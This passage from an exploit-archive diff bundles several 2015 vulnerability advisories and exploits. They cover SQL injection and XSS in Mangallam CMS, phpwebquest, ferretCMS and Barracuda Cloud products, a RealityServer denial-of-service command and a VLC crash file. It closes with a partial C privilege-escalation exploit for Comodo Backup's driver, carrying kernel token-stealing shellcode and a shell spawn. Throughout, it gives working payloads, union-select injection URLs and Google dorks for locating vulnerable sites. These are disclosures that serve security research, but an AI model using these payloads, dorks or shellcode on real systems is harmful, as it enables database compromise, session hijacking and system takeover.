Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote SQL-Injection web vulnerability in the official Mangallam Content Management System 2015-Q1.
Vulnerability Disclosure Timeline:
==================================
2015-01-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Mangallam Content Management System 2015-Q1.
The sql vulnerability allows an attacker to inject sql commands to compromise the application & database management system.
The sql injection vulnerability is located in the `newsid` value of the vulnerable `news_view.php` application file. Remote attackers
are able to inject own sql commands by manipulation of the vulnerable newsid value in the `news_view.php` file. A successful attack
requires to manipulate a GET method request with vulnerable `newsid` value to inject own sql commands. The injection is a classic
order by sql injection that allows to compromise the web-application and connected database management system. The request method to
inject own sql commands is GET and the vulnerability is located on the application-side of the service.
The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.9.
Exploitation of the application-side web vulnerability requires no privileged web-application user account and no user interaction.
Successful exploitation of the security vulnerability result in web-application and database management system compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] News
Vulnerable File(s):
[+] news_view.php
Vulnerable Parameter(s):
[+] newsid
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Dork(s):
allinurl:news_view.php?newsid=
title:Powered By Powered by Mangallam
PoC:
http://localhost:8080/news_view.php?newsid=-1'[REMOTE SQL-INJECTION VULNERABILITY!]--
Reference(s):
http://localhost:8080/news_view.php
Solution - Fix & Patch:
=======================
The remote vulnerability can be patched by usage of a prepared statement next to the newsid GET method request.
Restrict and filter the newsid value and disallow input of special chars. Prevent disaplaying of php errors by usage of the (0)error (php) function.
Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the content management system is estimated as critical.
Credits & Authors:
==================
IranGuard Security Team - P0!s0nC0d3
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

143
platforms/php/webapps/35900.txt Executable file
View file

@ -0,0 +1,143 @@
Document Title:
===============
Barracuda Networks Cloud Series - Filter Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=754
Barracuda Networks Security ID (BNSEC): 731
Release Date:
=============
2015-01-19
Vulnerability Laboratory ID (VL-ID):
====================================
754
Common Vulnerability Scoring System:
====================================
4.5
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.
Vulnerability Disclosure Timeline:
==================================
2015-01-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Cloud Control Center 2014 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script codes.
The barracuda filter blocks for example standard iframes, scripts and other invalid code context: The cloud service has a own exception-handling
to parse or encode malicious injected web context. The mechanism filters the first request and sanitizes the output in every input field.
During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked! In the next step the attacker splits (%20%20%20)
the request and injects at the end an onload frame to an external malicious source. The second iframe with the onload alert executes the script codes after
the validation encoded only the first script code tag. The second script code tag can bypass the applicance filter mechanism and executes in the web context
of affected modules. The secure validation does not recognize a splitted request which results in client-side and application-side script code execution in
the cloud series products.
The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium).
Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation
of affected or connected module context.
Vulnerable Request Method(s):
[+] POST & GET
Proof of Concept (PoC):
=======================
The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <
PoC:
<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>
Solution - Fix & Patch:
=======================
The issue can be patched by a secure validation of the full message input body context of any input or request method attempt.
Ensure that the validaton does not only encode the first injected script code since a empty char arrives. Filter all web context
that runs through the requesting procedure and parse separatly to prevent script code injection attacks.
Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service.
Security Risk:
==============
The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

268
platforms/php/webapps/35906.txt Executable file
View file

@ -0,0 +1,268 @@
# Exploit Title: sql injection
# Google Dork: inurl:webquest/soporte_horizontal_w.php?id_actividad=
# Date: [24/01/2015]
# Exploit Author: [jord4nroo7] anonjo@aol.com
# Vendor Homepage: [http://phpwebquest.org]
# Software Link: [http://phpwebquest.org/?page_id=14]
# Version: [phpwebquest-2.6]
# Tested on: [windows 8.1]
#Exploit: sql inhection found on phpwebquest script version 2.6
#
#example http://localhost/phpwq/webquest/soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27'
#---------------------------
if ($_GET['id_actividad']!=''){
$id_actividad=$_GET['id_actividad'];--------->sqlinjection here
}else{
$id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
$id_pagina=$_GET['id_pagina'];
}else{
$id_pagina='1';
$texto_actual=$texto_alternativo;
$imagen_actual='../imagenes/no_imagen.gif';
}
#----------------------------
<?
session_cache_limiter('nocache,private');
session_start();
session_set_cookie_params(0, "/", $HTTP_SERVER_VARS["HTTP_HOST"], 0);
include("../include/mysql.php");
include("../include/idioma.php");
$base=$mysql_db;
$c=mysql_connect($mysql_server,$mysql_login,$mysql_pass);
mysql_select_db ($base, $c);
#para solucionar un problema que se plantea cuando los usuarios crean la actividad pero no crean páginas
if ($_GET['id_actividad']!=''){
$id_actividad=$_GET['id_actividad'];
}else{
$id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
$id_pagina=$_GET['id_pagina'];
}else{
$id_pagina='1';
$texto_actual=$texto_alternativo;
$imagen_actual='../imagenes/no_imagen.gif';
}
#echo "PAGINA DEL GET:".$id_pagina."<br>";
#echo "PAGINA DEL GET:".$id_pagina."<br>";
$sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
# echo $indice.":".$valor."<br>";
$campo[$indice]=$valor;
}
}
}
$sentencia="select * from pagina where id_actividad=".$id_actividad." order by num_pagina asc";
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
#echo $indice.":".$valor."<br>";
$campo[$j][$indice]=$valor;
}
}
$j++;
}
for ($cont=1; $cont<=5; $cont++){
if ($campo[$cont]['num_pagina']==$id_pagina){
$texto_actual=$campo[$cont]['texto'];
$imagen_actual=$campo[$cont]['imagen'];
}
}
$resta=0;
$tamano_enlaces=$campo['font_size'] - $resta ;
$tamano_titulo=$campo['font_size'];
#echo $tamano_titulo;
?>
<html>
<head>
<title>PHP Webquest</title>
<!-- Webquest elaborada con PHP Webquest http://www.phpwebquest.org
Programa elaborado por Antonio Temprano bajo Licencia GPL
Puede ser utilizado gratuitamente por quien quiera hacerlo con fines
educativos y con la obligación de no quitar estas líneas de código
-->
<style>
table {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
font-weight : normal;
color: <? echo $campo['color_texto_principal'];?>;
}
a {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces'];?>;
font-weight : normal;
}
a:hover {
position: relative;
top: 1px;
left: 1px;
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces_resaltados'];?>;
font-weight : normal;
}
div.phpwebquest { font-size : 7.5pt;}
div.phpwebquest a:link { font-size : 7.5pt;}
div.phpwebquest a:hover { font-size : 7.5pt;}
div.phpwebquest a { font-size : 7.5pt;};
</style>
</head>
<body bgcolor="<? echo $campo['color_fondo_pagina'];?>">
<div align="center">
<table width="750" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_pagina'];?>">
<tr>
<td><div align="center">
<table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_texto'];?>">
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td height="50"><div valign="middle" align="center"><h1><font color="<? echo $campo['color_texto_titulo'];?>"><? echo $campo['titulo'];?></font></h1></div></td>
</tr>
<tr>
<? if ($id_pagina==1){
$titular=$introduccion;
}elseif($id_pagina==2){
$titular=$tareas;
}elseif($id_pagina==3){
$titular=$proceso;
}elseif($id_pagina==4){
$titular=$evaluacion;
}else{
$titular=$conclusiones;
}
?>
<td height="50" bgcolor="<? echo $campo['color_cuadro_pagina'];?>"><font color="<? echo $campo['color_texto_tipo'];?>"><div valign="middle" align="center"><h3><? echo $titular;?></h3></div></font></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="81%" valign="top"><table width="100%" height="141" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" height="139"> </td>
<td width="97%" valign="middle"><div align="left">
<table width="100%" height="134" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" valign="top"><div align="left"><img src="<? echo $imagen_actual;?>"></div></td>
<td width="2%"> </td>
<td width="97%"><? echo $texto_actual;?><br>
<table align=center width="80%" border=0 bgcolor="<? echo $campo['color_cuadro_menu'];?>">
<? if ($id_pagina==3){
echo '<tr></tr>';
$sentencia="select url, descripcion from url where id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
if($indice=='url'){
echo '<tr><td><div class="celdamenu"><a href='.$valor.' target="_blank"></div>';
}else{
echo $valor."</td></tr>";
}
$url[$j][$indice]=$valor;
}
}
$j++;
}
}
mysql_close($c);
?>
</table>
</td>
</tr>
</table>
</div></td>
<td width="2%"> </td>
</tr>
</table></td>
<td width="15%" valign="top">
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_texto'];?>" bordercolor="#FFFFFF"><tr><td> </td></tr></table>
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_menu'];?>" bordercolor="#FFFFFF">
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=1"; ?>"> <? echo $enlace_introduccion; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=2"; ?>"> <? echo $enlace_tareas; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=3"; ?>"> <? echo $enlace_proceso; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=4"; ?>"> <? echo $enlace_evaluacion; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=5"; ?>"> <? echo $enlace_conclusiones; ?></a></font></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="19">
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="55%"><div class="phpwebquest" align="right"><? echo $elaborada; ?> <? echo $campo['autor'];?> <? echo $con; ?></div></td>
<td width="45%"><div class="phpwebquest" align="left"><a href="http://www.phpwebquest.org"> PHPWebquest</a></div></td>
</tr>
</table>
</td>
</tr>
</table>
</div></td>
</tr>
</table>
</div>
</body>
</html>
#greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers

121
platforms/php/webapps/35914.txt Executable file
View file

@ -0,0 +1,121 @@
Advisory:
Advisory ID: SROEADV-2015-10
Author: Steffen Rösemann
Affected Software: ferretCMS v. 1.0.4-alpha
Vendor URL: https://github.com/JRogaishio/ferretCMS
Vendor Status: vendor will patch eventually
CVE-ID: -
Tested on:
- Firefox 35, Iceweasel 31
- Mac OS X 10.10, Kali Linux 1.0.9a
==========================
Vulnerability Description:
==========================
The content management system ferretCMS v.1.0.4, which is currently in
alpha development stage, suffers from multiple stored/reflecting XSS- and
SQLi-vulnerabilities in its administrative backend.
Moreover, there exists the possibility to upload arbitrary files via the
administrative backend, which can be executed by unauthenticated users, too.
==================
Technical Details:
==================
A reflecting XSS vulnerability can be found in the parameter "action" used
in the file admin.php:
http://
{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Stored XSS vulnerabilities resides in the logging functionality of
ferretCMS. On the administrative backend, the administrator has the
opportunity to watch events stored in a log. An event, that gets logged,
are login-attempts to the administrative backend, where the used username
is displayed, too. An attacker can abuse this, by trying to log in with
JavaScript-code instead of a username. That code gets executed in the logs.
Login-form is located here: http://{TARGET}/admin.php
XSS gets executed here: http://{TARGET}/admin.php?type=log&action=read
Another stored XSS vulnerability can be found in the pagetitle of a new
blog entry that is created by the administrator:
vulnerable form: http://{TARGET}/admin.php?type=page&action=insert&p=
XSS gets executed here: http://{TARGET}/admin.php?type=page&action=read
The following URLs are prone to SQL injection attacks:
http://
{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
http://
{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
http://
{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
http://
{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
http://
{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+
Last but not least there is a file-upload functionality in the
administrative backend of ferretCMS. The administrator can upload arbitrary
files here via the following URL:
http://localhost/ferretCMS/admin.php?type=uploader&action=upload
Any unauthenticated user can execute/read those files that had been
uploaded by visiting the following URL:
http://{TARGET}/custom/uploads/{NAME_OF_THE_UPLOADED_FILE}
=========
Solution:
=========
Vendor responded, issues will be patched eventually.
====================
Disclosure Timeline:
====================
15/16-Jan-2015 found the vulnerability
16-Jan-2015 - informed the developers (see [3])
16-Jan-2015 release date of this security advisory [without technical
details]
21-Jan-2015 - attempt #2 to inform the developer via mail
22-Jan-2015 - vendor responded, technical details posted to Github (see [3])
22-Jan-2015 - release date of this security advisory
22-Jan-2015 - send to lists
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS

88
platforms/windows/dos/35895.txt Executable file
View file

@ -0,0 +1,88 @@
source: http://www.securityfocus.com/bid/48476/info
RealityServer Web Services is prone to a remote denial-of-service vulnerability caused by a NULL pointer dereference.
Attackers can exploit this issue to cause the server to dereference an invalid memory location, resulting in a denial-of-service condition. Due to the nature of this issue arbitrary code-execution maybe possible; however this has not been confirmed.
RealityServer Web Services 3.1.1 build 144525.5057 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/35895.zip
#######################################################################
Luigi Auriemma
Application: NVIDIA RealityServer
http://www.realityserver.com/products/realityserver.html
http://www.nvidia.com/object/realityserver.html
Versions: <= 3.1.1 build 144525.5057
Platforms: Windows and Linux
Bug: NULL pointer
Exploitation: remote, versus server
Date: 27 Jun 2011 (found and reported on my forum 04 Dec 2010)
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"The RealityServer? platform is a powerful combination of NVIDIA?
Tesla? GPUs and 3D web services software that delivers interactive,
photorealistic applications over the web, enabling product designers,
architects and consumers to easily visualize 3D scenes with remarkable
realism."
#######################################################################
======
2) Bug
======
If the byte at offset 0xc01 of the packet is >= 0x80 there will be a
NULL pointer dereference.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
udpsz -C 03 -b 0xff -T SERVER 1935 0xc02
#######################################################################
======
4) Fix
======
No fix.
#######################################################################

View file

@ -0,0 +1,29 @@
Title : VLC Player 2.1.5 DEP Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
CVE ID : CVE-2014-9597
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9597>
NIST: ?https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450>
VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389>
windbglog : windbglog.txt
<https://trac.videolan.org/vlc/attachment/ticket/13389/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
Description : VLC Media Player contains a flaw that is triggered as
user-supplied input is not properly sanitized when handling a specially crafted
FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
## EDB Mirror: http://www.exploit-db.com/sploits/35901-poc.flv
## EDB Mirror: http://www.exploit-db.com/sploits/35901-windbglog.txt

270
platforms/windows/local/35905.c Executable file
View file

@ -0,0 +1,270 @@
/*
Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation
Date - 23rd January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.comodo.com
Tested Version - 4.4.0.0
Driver Version - 1.0.0.957 - bdisk.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/112828
CVE ID - CVE-2014-9633
Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html
Fixed version - 4.4.1.23
Fixed Driver Ver - 1.0.0.972
Note
----
Does not cleanly exit, had to use some leave instructions to get the command
prompt. If you know of a better way please do let me know.
Below in from Windows XP in IofCallDriver function.
eax = 12h
804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000
804e3801 52 push edx
804e3802 51 push ecx
804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090
804e3807 5e pop esi
804e3808 c3 ret
esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE token_steal_w7[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE ESInull[] = "\x00\x00\x00\x00";
BYTE RETaddr[] = "\x90\x00\x00\x00";
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtAllocateVirtualMemory NtAllocateVirtualMemory;
NTSTATUS allocstatus;
LPVOID base_addr = (LPVOID)0x00000001;
DWORD written;
int rwresult;
int size = BUFSIZE;
HANDLE hDevice;
unsigned char buffer[BUFSIZE];
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "bdisk");
NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
return -1;
}
printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
printf("[+] Allocating memory at [0x%p]\n", base_addr);
